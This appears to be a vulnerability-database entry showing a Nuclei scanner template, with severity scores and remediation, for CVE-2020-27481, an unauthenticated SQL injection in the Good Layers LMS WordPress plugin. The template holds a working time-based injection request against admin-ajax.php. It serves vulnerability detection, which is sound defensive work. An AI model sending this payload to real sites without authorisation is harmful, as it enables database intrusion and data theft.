Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-27481
HistorySep 30, 2022 - 4:54 p.m.

Good Layers LMS Plugin <= 2.1.4 - SQL Injection

2022-09-3016:54:07
ProjectDiscovery
github.com
2
good layers lms
sql injection
wordpress
unauthenticated user
data leakage

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

AI Score

Confidence

High

0.117 Low

EPSS

Percentile

95.3%

An unauthenticated SQL Injection vulnerability in Good Layers LMS Plugin &lt;= 2.1.4 exists due to the usage of "wp_ajax_nopriv" call in WordPress, which allows any unauthenticated user to get access to the function "gdlr_lms_cancel_booking" where POST Parameter "id" was sent straight into SQL query without sanitization.
id: CVE-2020-27481

info:
  name: Good Layers LMS Plugin <= 2.1.4 - SQL Injection
  author: edoardottt
  severity: critical
  description: |
    An unauthenticated SQL Injection vulnerability in Good Layers LMS Plugin <= 2.1.4 exists due to the usage of "wp_ajax_nopriv" call in WordPress, which allows any unauthenticated user to get access to the function "gdlr_lms_cancel_booking" where POST Parameter "id" was sent straight into SQL query without sanitization.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Upgrade to the latest version of the Good Layers LMS Plugin (2.1.5 or higher) to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/652eaef8-5a3c-4a2d-ac60-b5414565c397
    - https://gist.github.com/0xx7/a7aaa8b0515139cf7e30c808c8d54070
    - https://nvd.nist.gov/vuln/detail/CVE-2020-27481
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-27481
    cwe-id: CWE-89
    epss-score: 0.11692
    epss-percentile: 0.95277
    cpe: cpe:2.3:a:goodlayers:good_learning_management_system:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: goodlayers
    product: good_learning_management_system
    framework: wordpress
  tags: cve,cve2020,goodlayerslms,sqli,wpscan,goodlayers,wordpress

http:
  - raw:
      - |
        @timeout: 15s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=gdlr_lms_cancel_booking&id=(SELECT%201337%20FROM%20(SELECT(SLEEP(6)))MrMV)

    matchers:
      - type: dsl
        dsl:
          - "duration>=6"
          - "status_code == 200"
          - "contains(body, 'goodlayers-lms') || contains(body, 'goodlms')"
        condition: and
# digest: 4a0a00473045022100de8e68d9f94b82af184c4830778f5a38d929abe4ad7c1b9a60ab64389a0adf0102200abfa6c9701dce38f221abae9f7130bf100efa9f0c5232356ad4a034340561b1:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

AI Score

Confidence

High

0.117 Low

EPSS

Percentile

95.3%